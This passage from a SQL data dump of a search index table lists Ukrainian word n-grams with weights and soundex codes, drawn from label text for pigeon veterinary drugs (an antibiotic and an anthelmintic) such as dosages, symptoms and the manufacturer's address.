птахів',0,1,1.3333,'д000',1,'*'),(1547841,'для птахів призначених','для птахів призначених',0,1,1.7333,'д000',1,'*'),(1547842,'для системного','для системного',0,1,1.4667,'д000',2,'*'),(1547843,'для системного застосування','для системного застосування',0,1,1.9,'д000',2,'*'),(1547844,'днів для','днів для',0,1,1.2667,'д000',1,'*'),(1547845,'днів для досягнення','днів для досягнення',0,1,1.6333,'д000',1,'*'),(1547846,'днів для профілактики','днів для профілактики',0,1,1.7,'д000',1,'*'),(1547847,'днів на','днів на',0,1,1.2333,'д000',1,'*'),(1547848,'днів на початку','днів на початку',0,1,1.5,'д000',1,'*'),(1547849,'днів після','днів після',0,1,1.3333,'д000',1,'*'),(1547850,'днів після навантаження','днів після навантаження',0,1,1.7667,'д000',1,'*'),(1547851,'днів при','днів при',0,1,1.2667,'д000',1,'*'),(1547852,'днів при гострій','днів при гострій',0,1,1.5333,'д000',1,'*'),(1547853,'дозування для','дозування для',0,1,1.4333,'д000',1,'*'),(1547854,'дозування для лікування','дозування для лікування',0,1,1.7667,'д000',1,'*'),(1547855,'доксициклін','доксициклін',0,0,0.7333,'д000',1,'*'),(1547856,'доксициклін та','доксициклін та',0,1,1.4667,'д000',1,'*'),(1547857,'доксициклін та метронідазол','доксициклін та метронідазол',0,1,1.9,'д000',1,'*'),(1547858,'досягнення','досягнення',0,0,0.6667,'д000',1,'*'),(1547859,'досягнення гарної','досягнення гарної',0,1,1.5667,'д000',1,'*'),(1547860,'досягнення гарної фізичної','досягнення гарної фізичної',0,1,1.8667,'д000',1,'*'),(1547861,'з відкритим','з відкритим',0,1,1.3667,'з000',1,'*'),(1547862,'з відкритим дзьобом','з відкритим дзьобом',0,1,1.6333,'з000',1,'*'),(1547863,'з носа','з носа',0,1,1.2,'з000',1,'*'),(1547864,'з носа сльозоточивість','з носа сльозоточивість',0,1,1.7333,'з000',1,'*'),(1547865,'за температуривід','за температуривід',0,1,1.5667,'з000',1,'*'),(1547866,'за температуривід 5','за температуривід 5',0,1,1.6333,'з000',1,'*'),(1547867,'задишка','задишка',0,0,0.4667,'з000',1,'*'),(1547868,'задишка утруднене','задишка утруднене',0,1,1.5667,'з000',1,'*'),(1547869,'задишка утруднене дихання','задишка утруднене дихання',0,1,1.8333,'з000',1,'*'),(1547870,'застереження не використовувати','застереження не використовувати',0,1,2,'з000',1,'*'),(1547871,'застосування для лікування','застосування для лікування',0,1,1.8667,'з000',1,'*'),(1547872,'захворюваннях дихальних','захворюваннях дихальних',0,1,1.7667,'з000',1,'*'),(1547873,'захворюваннях дихальних шляхів','захворюваннях дихальних шляхів',0,1,2,'з000',1,'*'),(1547874,'збільшена','збільшена',0,0,0.6,'з000',1,'*'),(1547875,'збільшена кількість','збільшена кількість',0,1,1.6333,'з000',1,'*'),(1547876,'збільшена кількість слини','збільшена кількість слини',0,1,1.8333,'з000',1,'*'),(1547877,'зберігання сухе місце','зберігання сухе місце',0,1,1.7,'з000',1,'*'),(1547878,'кількість слини','кількість слини',0,1,1.5,'к000',1,'*'),(1547879,'кількість слини в','кількість слини в',0,1,1.5667,'к000',1,'*'),(1547880,'кишкової','кишкової',0,0,0.5333,'к000',1,'*'),(1547881,'кишкової палички','кишкової палички',0,1,1.5333,'к000',1,'*'),(1547882,'кишкової палички esherichia','кишкової палички esherichia',0,1,1.9,'к262',1,'*'),(1547883,'кольору розчинний','кольору розчинний',0,1,1.5667,'к000',1,'*'),(1547884,'кольору розчинний у','кольору розчинний у',0,1,1.6333,'к000',1,'*'),(1547885,'л води 40','л води 40',0,1,1.3,'л000',1,'*'),(1547886,'л води протягом','л води протягом',0,1,1.5,'л000',1,'*'),(1547887,'лікування 2,5','лікування 2,5',0,1,1.4333,'л000',1,'*'),(1547888,'лікування 2,5 г','лікування 2,5 г',0,1,1.5,'л000',1,'*'),(1547889,'лікування і','лікування і',0,1,1.3667,'л000',3,'*'),(1547890,'лікування і профілактики','лікування і профілактики',0,1,1.8,'л000',2,'*'),(1547891,'м рівне україна','м рівне україна',0,1,1.5,'м000',1,'*'),(1547892,'мікоплазмоза','мікоплазмоза',0,0,0.8,'м000',1,'*'),(1547893,'мікоплазмоза mycoplasma','мікоплазмоза mycoplasma',0,1,1.7667,'м521425',1,'*'),(1547894,'мікоплазмоза mycoplasma columborale','мікоплазмоза mycoplasma columborale',0,1,2,'м521425245164',1,'*'),(1547895,'містить тилозин','містить тилозин',0,1,1.5,'м000',1,'*'),(1547896,'містить тилозин тартрат','містить тилозин тартрат',0,1,1.7667,'м000',1,'*'),(1547897,'місце за температуривід','місце за температуривід',0,1,1.7667,'м000',1,'*'),(1547898,'метронідазол застосування','метронідазол застосування',0,1,1.8333,'м000',1,'*'),(1547899,'метронідазол застосування для','метронідазол застосування для',0,1,1.9667,'м000',1,'*'),(1547900,'на горлі','на горлі',0,1,1.2667,'н000',1,'*'),(1547901,'на горлі гортані','на горлі гортані',0,1,1.5333,'н000',1,'*'),(1547902,'на початку','на початку',0,1,1.3333,'н000',1,'*'),(1547903,'на початку гоночного','на початку гоночного',0,1,1.6667,'н000',1,'*'),(1547904,'набряк','набряк',0,0,0.4,'н000',1,'*'),(1547905,'набряк повік','набряк повік',0,1,1.4,'н000',1,'*'),(1547906,'набряк повік дихання','набряк повік дихання',0,1,1.6667,'н000',1,'*'),(1547907,'навантаження','навантаження',0,0,0.8,'н000',1,'*'),(1547908,'навантаження гонки','навантаження гонки',0,1,1.6,'н000',1,'*'),(1547909,'навантаження гонки або','навантаження гонки або',0,1,1.7333,'н000',1,'*'),(1547910,'нальоти','нальоти',0,0,0.4667,'н000',1,'*'),(1547911,'нальоти на','нальоти на',0,1,1.3333,'н000',1,'*'),(1547912,'нальоти на горлі','нальоти на горлі',0,1,1.5333,'н000',1,'*'),(1547913,'не використовувати для','не використовувати для',0,1,1.7333,'н000',1,'*'),(1547914,'носа','носа',0,0,0.2667,'н000',1,'*'),(1547915,'носа сльозоточивість','носа сльозоточивість',0,1,1.6667,'н000',1,'*'),(1547916,'носа сльозоточивість набряк','носа сльозоточивість набряк',0,1,1.9,'н000',1,'*'),(1547917,'орнітозі','орнітозі',0,0,0.5333,'о000',1,'*'),(1547918,'орнітозі 5','орнітозі 5',0,1,1.3333,'о000',1,'*'),(1547919,'орнітозі 5 г','орнітозі 5 г',0,1,1.4,'о000',1,'*'),(1547920,'орнітозу','орнітозу',0,0,0.5333,'о000',1,'*'),(1547921,'орнітозу chlamydophila','орнітозу chlamydophila',0,1,1.7333,'о245314',1,'*'),(1547922,'орнітозу chlamydophila psittaci','орнітозу chlamydophila psittaci',0,1,2,'о2453141232',1,'*'),(1547923,'підтримки','підтримки',0,0,0.6,'п000',1,'*'),(1547924,'підтримки спортивної','підтримки спортивної',0,1,1.6667,'п000',1,'*'),(1547925,'підтримки спортивної форми','підтримки спортивної форми',0,1,1.8667,'п000',1,'*'),(1547926,'після','після',0,0,0.3333,'п000',6,'*'),(1547927,'після навантаження','після навантаження',0,1,1.6,'п000',1,'*'),(1547928,'після навантаження гонки','після навантаження гонки',0,1,1.8,'п000',1,'*'),(1547929,'палички','палички',0,0,0.4667,'п000',1,'*'),(1547930,'палички esherichia','палички esherichia',0,1,1.6,'п262',1,'*'),(1547931,'палички esherichia coli','палички esherichia coli',0,1,1.7667,'п2624',1,'*'),(1547932,'по 10 200','по 10 200',0,1,1.3,'п000',1,'*'),(1547933,'повік','повік',0,0,0.3333,'п000',1,'*'),(1547934,'повік дихання','повік дихання',0,1,1.4333,'п000',1,'*'),(1547935,'повік дихання з','повік дихання з',0,1,1.5,'п000',1,'*'),(1547936,'порошок світло-жовтого','порошок світло-жовтого',0,1,1.7333,'п000',1,'*'),(1547937,'порошок світло-жовтого кольору','порошок світло-жовтого кольору',0,1,2,'п000',1,'*'),(1547938,'початку','початку',0,0,0.4667,'п000',1,'*'),(1547939,'початку гоночного','початку гоночного',0,1,1.5667,'п000',1,'*'),(1547940,'початку гоночного сезону','початку гоночного сезону',0,1,1.8,'п000',1,'*'),(1547941,'пп фірма фарматон','пп фірма фарматон',0,1,1.5667,'п000',1,'*'),(1547942,'препарат для','препарат для',0,1,1.4,'п000',2,'*'),(1547943,'препарат для системного','препарат для системного',0,1,1.7667,'п000',1,'*'),(1547944,'препарат містить','препарат містить',0,1,1.5333,'п000',2,'*'),(1547945,'препарат містить тилозин','препарат містить тилозин',0,1,1.8,'п000',1,'*'),(1547946,'при гострій','при гострій',0,1,1.3667,'п000',1,'*'),(1547947,'при гострій формі','при гострій формі',0,1,1.5667,'п000',1,'*'),(1547948,'при захворюваннях дихальних','при захворюваннях дихальних',0,1,1.9,'п000',1,'*'),(1547949,'призначених для вживання','призначених для вживання',0,1,1.8,'п000',1,'*'),(1547950,'протягом 2','протягом 2',0,1,1.3333,'п000',2,'*'),(1547951,'протягом 2 днів','протягом 2 днів',0,1,1.5,'п000',1,'*'),(1547952,'протягом 3','протягом 3',0,1,1.3333,'п000',2,'*'),(1547953,'протягом 3 днів','протягом 3 днів',0,1,1.5,'п000',1,'*'),(1547954,'протягом 5','протягом 5',0,1,1.3333,'п000',2,'*'),(1547955,'протягом 5 днів','протягом 5 днів',0,1,1.5,'п000',1,'*'),(1547956,'протягом 5-7','протягом 5-7',0,1,1.4,'п000',1,'*'),(1547957,'протягом 5-7 днів','протягом 5-7 днів',0,1,1.5667,'п000',1,'*'),(1547958,'протягом 8-16','протягом 8-16',0,1,1.4333,'п000',1,'*'),(1547959,'протягом 8-16 днів','протягом 8-16 днів',0,1,1.6,'п000',1,'*'),(1547960,'профілактики в','профілактики в',0,1,1.4667,'п000',1,'*'),(1547961,'профілактики в голубів','профілактики в голубів',0,1,1.7333,'п000',1,'*'),(1547962,'профілактики щомісячно','профілактики щомісячно',0,1,1.7333,'п000',1,'*'),(1547963,'профілактики щомісячно 2,5','профілактики щомісячно 2,5',0,1,1.8667,'п000',1,'*'),(1547964,'птахів при','птахів при',0,1,1.3333,'п000',2,'*'),(1547965,'птахів при захворюваннях','птахів при захворюваннях',0,1,1.8,'п000',1,'*'),(1547966,'птахів призначених','птахів призначених',0,1,1.6,'п000',1,'*'),(1547967,'птахів призначених для','птахів призначених для',0,1,1.7333,'п000',1,'*'),(1547968,'рівне україна','рівне україна',0,1,1.4333,'р000',1,'*'),(1547969,'рівне україна 33001','рівне україна 33001',0,1,1.6333,'р000',1,'*'),(1547970,'розчинний','розчинний',0,0,0.6,'р000',1,'*'),(1547971,'розчинний у','розчинний у',0,1,1.3667,'р000',1,'*'),(1547972,'розчинний у воді','розчинний у воді',0,1,1.5333,'р000',1,'*'),(1547973,'роті','роті',0,0,0.2667,'р000',1,'*'),(1547974,'роті нальоти','роті нальоти',0,1,1.4,'р000',1,'*'),(1547975,'роті нальоти на','роті нальоти на',0,1,1.5,'р000',1,'*'),(1547976,'с виробник','с виробник',0,1,1.3333,'с000',1,'*'),(1547977,'с виробник пп','с виробник пп',0,1,1.4333,'с000',1,'*'),(1547978,'світло-жовтого','світло-жовтого',0,0,0.9333,'с000',1,'*'),(1547979,'світло-жовтого кольору','світло-жовтого кольору',0,1,1.7333,'с000',1,'*'),(1547980,'світло-жовтого кольору розчинний','світло-жовтого кольору розчинний',0,1,2,'с000',1,'*'),(1547981,'сезону','сезону',0,0,0.4,'с000',3,'*'),(1547982,'сезону для','сезону для',0,1,1.3333,'с000',1,'*'),(1547983,'сезону для підтримки','сезону для підтримки',0,1,1.6667,'с000',1,'*'),(1547984,'симптоми','симптоми',0,0,0.5333,'с000',1,'*'),(1547985,'симптоми чхання','симптоми чхання',0,1,1.5,'с000',1,'*'),(1547986,'симптоми чхання задишка','симптоми чхання задишка',0,1,1.7667,'с000',1,'*'),(1547987,'системного','системного',0,0,0.6667,'с000',2,'*'),(1547988,'системного застосування','системного застосування',0,1,1.7667,'с000',2,'*'),(1547989,'склад препарат','склад препарат',0,1,1.4667,'с000',2,'*'),(1547990,'склад препарат містить','склад препарат містить',0,1,1.7333,'с000',2,'*'),(1547991,'слини','слини',0,0,0.3333,'с000',1,'*'),(1547992,'слини в','слини в',0,1,1.2333,'с000',1,'*'),(1547993,'слини в роті','слини в роті',0,1,1.4,'с000',1,'*'),(1547994,'сльозоточивість','сльозоточивість',0,0,1,'с000',1,'*'),(1547995,'сльозоточивість набряк','сльозоточивість набряк',0,1,1.7333,'с000',1,'*'),(1547996,'сльозоточивість набряк повік','сльозоточивість набряк повік',0,1,1.9333,'с000',1,'*'),(1547997,'спортивної','спортивної',0,0,0.6667,'с000',1,'*'),(1547998,'спортивної форми','спортивної форми',0,1,1.5333,'с000',1,'*'),(1547999,'спортивної форми 2,5','спортивної форми 2,5',0,1,1.6667,'с000',1,'*'),(1548000,'сухе місце','сухе місце',0,1,1.3333,'с000',1,'*'),(1548001,'сухе місце за','сухе місце за',0,1,1.4333,'с000',1,'*'),(1548002,'тілоциклін','тілоциклін',0,0,0.6667,'т000',1,'*'),(1548003,'тілоциклін антибактеріальний','тілоциклін антибактеріальний',0,1,1.9333,'т000',1,'*'),(1548004,'тілоциклін антибактеріальний препарат','тілоциклін антибактеріальний препарат',0,1,2,'т000',1,'*'),(1548005,'та метронідазол','та метронідазол',0,1,1.5,'т000',1,'*'),(1548006,'та метронідазол застосування','та метронідазол застосування',0,1,1.9333,'т000',1,'*'),(1548007,'тартрат','тартрат',0,0,0.4667,'т000',1,'*'),(1548008,'тартрат доксициклін','тартрат доксициклін',0,1,1.6333,'т000',1,'*'),(1548009,'тартрат доксициклін та','тартрат доксициклін та',0,1,1.7333,'т000',1,'*'),(1548010,'температуривід','температуривід',0,0,0.9333,'т000',1,'*'),(1548011,'температуривід 5','температуривід 5',0,1,1.5333,'т000',1,'*'),(1548012,'температуривід 5 до','температуривід 5 до',0,1,1.6333,'т000',1,'*'),(1548013,'тилозин','тилозин',0,0,0.4667,'т000',1,'*'),(1548014,'тилозин тартрат','тилозин тартрат',0,1,1.5,'т000',1,'*'),(1548015,'тилозин тартрат доксициклін','тилозин тартрат доксициклін',0,1,1.9,'т000',1,'*'),(1548016,'трахеї','трахеї',0,0,0.4,'т000',1,'*'),(1548017,'трахеї дозування','трахеї дозування',0,1,1.5333,'т000',1,'*'),(1548018,'трахеї дозування для','трахеї дозування для',0,1,1.6667,'т000',1,'*'),(1548019,'тренування','тренування',0,0,0.6667,'т000',1,'*'),(1548020,'тренування застереження','тренування застереження',0,1,1.7667,'т000',1,'*'),(1548021,'тренування застереження не','тренування застереження не',0,1,1.8667,'т000',1,'*'),(1548022,'трихомонозу','трихомонозу',0,0,0.7333,'т000',1,'*'),(1548023,'трихомонозу trichomonas','трихомонозу trichomonas',0,1,1.7667,'т36252',1,'*'),(1548024,'трихомонозу trichomonas gallinae','трихомонозу trichomonas gallinae',0,1,2,'т3625245',1,'*'),(1548025,'україна 33001','україна 33001',0,1,1.4333,'у000',1,'*'),(1548026,'утруднене','утруднене',0,0,0.6,'у000',1,'*'),(1548027,'утруднене дихання','утруднене дихання',0,1,1.5667,'у000',1,'*'),(1548028,'утруднене дихання виділення','утруднене дихання виділення',0,1,1.9,'у000',1,'*'),(1548029,'фізичної','фізичної',0,0,0.5333,'ф000',1,'*'),(1548030,'фізичної форми','фізичної форми',0,1,1.4667,'ф000',1,'*'),(1548031,'фізичної форми 2,5','фізичної форми 2,5',0,1,1.6,'ф000',1,'*'),(1548032,'фірма фарматон','фірма фарматон',0,1,1.4667,'ф000',1,'*'),(1548033,'фірма фарматон вул','фірма фарматон вул',0,1,1.6,'ф000',1,'*'),(1548034,'фарматон вул','фарматон вул',0,1,1.4,'ф000',1,'*'),(1548035,'фарматон вул дворецька','фарматон вул дворецька',0,1,1.7333,'ф000',1,'*'),(1548036,'формі','формі',0,0,0.3333,'ф000',1,'*'),(1548037,'формі і','формі і',0,1,1.2333,'ф000',1,'*'),(1548038,'формі і орнітозі','формі і орнітозі',0,1,1.5333,'ф000',1,'*'),(1548039,'форми','форми',0,0,0.3333,'ф000',1,'*'),(1548040,'форми 2,5','форми 2,5',0,1,1.3,'ф000',1,'*'),(1548041,'форми 2,5 г','форми 2,5 г',0,1,1.3667,'ф000',1,'*'),(1548042,'чхання','чхання',0,0,0.4,'ч000',1,'*'),(1548043,'чхання задишка','чхання задишка',0,1,1.4667,'ч000',1,'*'),(1548044,'чхання задишка утруднене','чхання задишка утруднене',0,1,1.8,'ч000',1,'*'),(1548045,'шляхів','шляхів',0,0,0.4,'ш000',1,'*'),(1548046,'шляхів орнітозу','шляхів орнітозу',0,1,1.5,'ш000',1,'*'),(1548047,'шляхів орнітозу chlamydophila','шляхів орнітозу chlamydophila',0,1,1.9667,'ш245314',1,'*'),(1548048,'щомісячно','щомісячно',0,0,0.6,'щ000',1,'*'),(1548049,'щомісячно 2,5','щомісячно 2,5',0,1,1.4333,'щ000',1,'*'),(1548050,'щомісячно 2,5 г','щомісячно 2,5 г',0,1,1.5,'щ000',1,'*'),(1548190,'1 таблетка','1 таблетка',0,1,1.3333,'т000',1,'*'),(1548191,'1 таблетка містить','1 таблетка містить',0,1,1.6,'т000',1,'*'),(1548192,'1 таблетці','1 таблетці',0,1,1.3333,'т000',1,'*'),(1548193,'1 таблетці кожному','1 таблетці кожному',0,1,1.6,'т000',1,'*'),(1548194,'1,43','1,43',0,0,0.4,'',1,'*'),(1548195,'1,43 мг','1,43 мг',0,1,1.2333,'м000',1,'*'),(1548196,'1,43 мг празиквантелу','1,43 мг празиквантелу',0,1,1.7,'м000',1,'*'),(1548197,'11,43','11,43',0,0,0.5,'',1,'*'),(1548198,'11,43 мг','11,43 мг',0,1,1.2667,'м000',1,'*'),(1548199,'11,43 мг фенбендазолу','11,43 мг фенбендазолу',0,1,1.7,'м000',1,'*'),(1548200,'2461','2461',0,0,0.4,'',1,'*'),(1548201,'250 г','250 г',0,1,1.1667,'г000',2,'*'),(1548202,'250 г одноразово','250 г одноразово',0,1,1.5333,'г000',1,'*'),(1548203,'2роки','2роки',0,0,0.3333,'р000',1,'*'),(1548204,'2роки для','2роки для',0,1,1.3,'р000',1,'*'),(1548205,'2роки для застосування','2роки для застосування',0,1,1.7333,'р000',1,'*'),(1548206,'4 місяці','4 місяці',0,1,1.2667,'м000',1,'*'),(1548207,'4 місяці застереження','4 місяці застереження',0,1,1.7,'м000',1,'*'),(1548208,'4-6','4-6',0,0,0.3,'',2,'*'),(1548209,'4-6 тижнів','4-6 тижнів',0,1,1.3333,'т000',2,'*'),(1548210,'4-6 тижнів з','4-6 тижнів з',0,1,1.4,'т000',1,'*'),(1548211,'50 таблеток','50 таблеток',0,1,1.3667,'т000',1,'*'),(1548212,'50 таблеток зберігання','50 таблеток зберігання',0,1,1.7333,'т000',1,'*'),(1548213,'glistoginnij','glistoginnij',0,0,0.8,'G423252',1,'*'),(1548214,'glistoginnij preparat','glistoginnij preparat',0,1,1.7,'G42325216163',1,'*'),(1548215,'i','i',0,0,0.0667,'I000',2,'*'),(1548216,'i робить','i робить',0,1,1.2667,'I000',1,'*'),(1548217,'i робить дегельмiнтизацiю','i робить дегельмiнтизацiю',0,1,1.8333,'I000',1,'*'),(1548218,'prazifen','prazifen',0,0,0.5333,'P6215',1,'*'),(1548219,'prazifen glistoginnij','prazifen glistoginnij',0,1,1.7,'P62152423252',1,'*'),(1548220,'prazifen glistoginnij preparat','prazifen glistoginnij preparat',0,1,2,'P6215242325216163',1,'*'),(1548221,'і профілактики цестодозов','і профілактики цестодозов',0,1,1.8333,'і000',1,'*'),(1548222,'і фенбендазолу','і фенбендазолу',0,1,1.4667,'і000',1,'*'),(1548223,'і фенбендазолу розширює','і фенбендазолу розширює',0,1,1.7667,'і000',1,'*'),(1548224,'із фольги','із фольги',0,1,1.3,'і000',1,'*'),(1548225,'із фольги по','із фольги по',0,1,1.4,'і000',1,'*'),(1548226,'інвазії','інвазії',0,0,0.4667,'і000',1,'*'),(1548227,'інвазії лікування','інвазії лікування',0,1,1.5667,'і000',1,'*'),(1548228,'інвазії лікування повторюють','інвазії лікування повторюють',0,1,1.9333,'і000',1,'*'),(1548229,'індивідуально','індивідуально',0,0,0.8667,'і000',1,'*'),(1548230,'індивідуально по','індивідуально по',0,1,1.5333,'і000',1,'*'),(1548231,'індивідуально по 1','індивідуально по 1',0,1,1.6,'і000',1,'*'),(1548232,'інсектициди','інсектициди',0,0,0.7333,'і000',1,'*'),(1548233,'інсектициди антгельмінтіки','інсектициди антгельмінтіки',0,1,1.8667,'і000',1,'*'),(1548234,'інсектициди антгельмінтіки або','інсектициди антгельмінтіки або',0,1,2,'і000',1,'*'),(1548235,'їх','їх',0,0,0.1333,'ї000',5,'*'),(1548236,'їх застосування','їх застосування',0,1,1.5,'ї000',1,'*'),(1548237,'їх застосування форма','їх застосування форма',0,1,1.7,'ї000',1,'*'),(1548238,'а також з','а також з',0,1,1.3,'а000',1,'*'),(1548239,'або відразу','або відразу',0,1,1.3667,'а000',1,'*'),(1548240,'або відразу після','або відразу після',0,1,1.5667,'а000',1,'*'),(1548241,'антгельмінтіки','антгельмінтіки',0,0,0.9333,'а000',1,'*'),(1548242,'антгельмінтіки або','антгельмінтіки або',0,1,1.6,'а000',1,'*'),(1548243,'антгельмінтіки або відразу','антгельмінтіки або відразу',0,1,1.8667,'а000',1,'*'),(1548244,'антигельмінтний','антигельмінтний',0,0,1,'а000',1,'*'),(1548245,'антигельмінтний препарат','антигельмінтний препарат',0,1,1.8,'а000',1,'*'),(1548246,'антигельмінтний препарат дія','антигельмінтний препарат дія',0,1,1.9333,'а000',1,'*'),(1548247,'антигельмінтної','антигельмінтної',0,0,1,'а000',1,'*'),(1548248,'антигельмінтної дii','антигельмінтної дii',0,1,1.6333,'а000',1,'*'),(1548249,'антигельмінтної дii препарату','антигельмінтної дii препарату',0,1,1.9667,'а000',1,'*'),(1548250,'більш','більш',0,0,0.3333,'б000',2,'*'),(1548251,'більш ефективною','більш ефективною',0,1,1.5333,'б000',1,'*'),(1548252,'більш ефективною застосування','більш ефективною застосування',0,1,1.9667,'б000',1,'*'),(1548253,'відносно','відносно',0,0,0.5333,'в000',2,'*'),(1548254,'відносно нематод','відносно нематод',0,1,1.5333,'в000',1,'*'),(1548255,'відносно нематод та','відносно нематод та',0,1,1.6333,'в000',1,'*'),(1548256,'відразу','відразу',0,0,0.4667,'в000',2,'*'),(1548257,'відразу після','відразу після',0,1,1.4333,'в000',1,'*'),(1548258,'відразу після їх','відразу після їх',0,1,1.5333,'в000',1,'*'),(1548259,'вагою','вагою',0,0,0.3333,'в000',2,'*'),(1548260,'вагою до','вагою до',0,1,1.2667,'в000',1,'*'),(1548261,'вагою до 250','вагою до 250',0,1,1.4,'в000',1,'*'),(1548262,'вимагає','вимагає',0,0,0.4667,'в000',2,'*'),(1548263,'вимагає збiльшення','вимагає збiльшення',0,1,1.6,'в000',1,'*'),(1548264,'вимагає збiльшення дози','вимагає збiльшення дози',0,1,1.7667,'в000',1,'*'),(1548265,'випуску пакети із','випуску пакети із',0,1,1.5667,'в000',1,'*'),(1548266,'виснаженої','виснаженої',0,0,0.6667,'в000',1,'*'),(1548267,'виснаженої птиці','виснаженої птиці',0,1,1.5333,'в000',1,'*'),(1548268,'виснаженої птиці а','виснаженої птиці а',0,1,1.6,'в000',1,'*'),(1548269,'властивості празіфен','властивості празіфен',0,1,1.6667,'в000',1,'*'),(1548270,'властивості празіфен антигельмінтний','властивості празіфен антигельмінтний',0,1,2,'в000',1,'*'),(1548271,'вмістом','вмістом',0,0,0.4667,'в000',1,'*'),(1548272,'вмістом празіквантелу','вмістом празіквантелу',0,1,1.7,'в000',1,'*'),(1548273,'вмістом празіквантелу та','вмістом празіквантелу та',0,1,1.8,'в000',1,'*'),(1548274,'г одноразово','г одноразово',0,1,1.4,'г000',1,'*'),(1548275,'г одноразово при','г одноразово при',0,1,1.5333,'г000',1,'*'),(1548276,'гельмiнтозах','гельмiнтозах',0,0,0.8,'г000',1,'*'),(1548277,'гельмiнтозах i','гельмiнтозах i',0,1,1.4667,'г000',1,'*'),(1548278,'гельмiнтозах i робить','гельмiнтозах i робить',0,1,1.7,'г000',1,'*'),(1548279,'глистогінний','глистогінний',0,0,0.8,'г000',1,'*'),(1548280,'глистогінний препарат','глистогінний препарат',0,1,1.7,'г000',1,'*'),(1548281,'голубів дозування препарат','голубів дозування препарат',0,1,1.8667,'г000',1,'*'),(1548282,'голубів сумiсна','голубів сумiсна',0,1,1.5,'г000',1,'*'),(1548283,'голубів сумiсна дiя','голубів сумiсна дiя',0,1,1.6333,'г000',1,'*'),(1548284,'голубу','голубу',0,0,0.4,'г000',1,'*'),(1548285,'голубу вагою','голубу вагою',0,1,1.4,'г000',1,'*'),(1548286,'голубу вагою до','голубу вагою до',0,1,1.5,'г000',1,'*'),(1548287,'дii','дii',0,0,0.2,'д000',1,'*'),(1548288,'дii препарату','дii препарату',0,1,1.4333,'д000',1,'*'),(1548289,'дii препарату не','дii препарату не',0,1,1.5333,'д000',1,'*'),(1548290,'дiапазон','дiапазон',0,0,0.5333,'д000',1,'*'),(1548291,'дiапазон антигельмінтної','дiапазон антигельмінтної',0,1,1.8,'д000',1,'*'),(1548292,'дiапазон антигельмінтної дii','дiапазон антигельмінтної дii',0,1,1.9333,'д000',1,'*'),(1548293,'дiя','дiя',0,0,0.2,'д000',1,'*'),(1548294,'дiя празіквантелу','дiя празіквантелу',0,1,1.5667,'д000',1,'*'),(1548295,'дiя празіквантелу і','дiя празіквантелу і',0,1,1.6333,'д000',1,'*'),(1548296,'дія','дія',0,0,0.2,'д000',3,'*'),(1548297,'дія якого','дія якого',0,1,1.3,'д000',1,'*'),(1548298,'дія якого зумовлена','дія якого зумовлена',0,1,1.6333,'д000',1,'*'),(1548299,'дегельмiнтизацiю','дегельмiнтизацiю',0,0,1,'д000',1,'*'),(1548300,'дегельмiнтизацiю більш','дегельмiнтизацiю більш',0,1,1.7333,'д000',1,'*'),(1548301,'дегельмiнтизацiю більш ефективною','дегельмiнтизацiю більш ефективною',0,1,2,'д000',1,'*'),(1548302,'до 250','до 250',0,1,1.2,'д000',1,'*'),(1548303,'до 250 г','до 250 г',0,1,1.2667,'д000',1,'*'),(1548304,'дози','дози',0,0,0.2667,'д000',1,'*'),(1548305,'дози при','дози при',0,1,1.2667,'д000',1,'*'),(1548306,'дози при змiшаних','дози при змiшаних',0,1,1.5667,'д000',1,'*'),(1548307,'дозування препарат застосовують','дозування препарат застосовують',0,1,2,'д000',1,'*'),(1548308,'ефективною','ефективною',0,0,0.6667,'е000',1,'*'),(1548309,'ефективною застосування','ефективною застосування',0,1,1.7667,'е000',1,'*'),(1548310,'ефективною застосування препарат','ефективною застосування препарат',0,1,2,'е000',1,'*'),(1548311,'з метою','з метою',0,1,1.2333,'з000',2,'*'),(1548312,'з метою профілактики','з метою профілактики',0,1,1.6667,'з000',1,'*'),(1548313,'з піперазином','з піперазином',0,1,1.4333,'з000',1,'*'),(1548314,'з піперазином холінергічних','з піперазином холінергічних',0,1,1.9,'з000',1,'*'),(1548315,'застереження не застосовувати','застереження не застосовувати',0,1,1.9667,'з000',1,'*'),(1548316,'застосовувати виснаженої','застосовувати виснаженої',0,1,1.8,'з000',1,'*'),(1548317,'застосовувати виснаженої птиці','застосовувати виснаженої птиці',0,1,2,'з000',1,'*'),(1548318,'застосовують для лікування','застосовують для лікування',0,1,1.8667,'з000',1,'*'),(1548319,'застосовують перорально','застосовують перорально',0,1,1.7667,'з000',1,'*'),(1548320,'застосовують перорально індивідуально','застосовують перорально індивідуально',0,1,2,'з000',1,'*'),(1548321,'застосування препарат','застосування препарат',0,1,1.7,'з000',1,'*'),(1548322,'застосування препарат застосовують','застосування препарат застосовують',0,1,2,'з000',1,'*'),(1548323,'застосування форма','застосування форма',0,1,1.6,'з000',1,'*'),(1548324,'застосування форма випуску','застосування форма випуску',0,1,1.8667,'з000',1,'*'),(1548325,'збiльшення','збiльшення',0,0,0.6667,'з000',1,'*'),(1548326,'збiльшення дози','збiльшення дози',0,1,1.5,'з000',1,'*'),(1548327,'збiльшення дози при','збiльшення дози при',0,1,1.6333,'з000',1,'*'),(1548328,'змiшаних','змiшаних',0,0,0.5333,'з000',1,'*'),(1548329,'змiшаних гельмiнтозах','змiшаних гельмiнтозах',0,1,1.7,'з000',1,'*'),(1548330,'змiшаних гельмiнтозах i','змiшаних гельмiнтозах i',0,1,1.7667,'з000',1,'*'),(1548331,'зумовлена','зумовлена',0,0,0.6,'з000',1,'*'),(1548332,'зумовлена вмістом','зумовлена вмістом',0,1,1.5667,'з000',1,'*'),(1548333,'зумовлена вмістом празіквантелу','зумовлена вмістом празіквантелу',0,1,2,'з000',1,'*'),(1548334,'кожні','кожні',0,0,0.3333,'к000',1,'*'),(1548335,'кожні 4','кожні 4',0,1,1.2333,'к000',1,'*'),(1548336,'кожні 4 місяці','кожні 4 місяці',0,1,1.4667,'к000',1,'*'),(1548337,'кожному','кожному',0,0,0.4667,'к000',4,'*'),(1548338,'кожному голубу','кожному голубу',0,1,1.4667,'к000',1,'*'),(1548339,'кожному голубу вагою','кожному голубу вагою',0,1,1.6667,'к000',1,'*'),(1548340,'лікування повторюють','лікування повторюють',0,1,1.6667,'л000',1,'*'),(1548341,'лікування повторюють через','лікування повторюють через',0,1,1.8667,'л000',1,'*'),(1548342,'містить 1,43','містить 1,43',0,1,1.4,'м000',1,'*'),(1548343,'містить 1,43 мг','містить 1,43 мг',0,1,1.5,'м000',1,'*'),(1548344,'місяці застереження','місяці застереження',0,1,1.6333,'м000',1,'*'),(1548345,'місяці застереження не','місяці застереження не',0,1,1.7333,'м000',1,'*'),(1548346,'мг празиквантелу','мг празиквантелу',0,1,1.5333,'м000',1,'*'),(1548347,'мг празиквантелу 11,43','мг празиквантелу 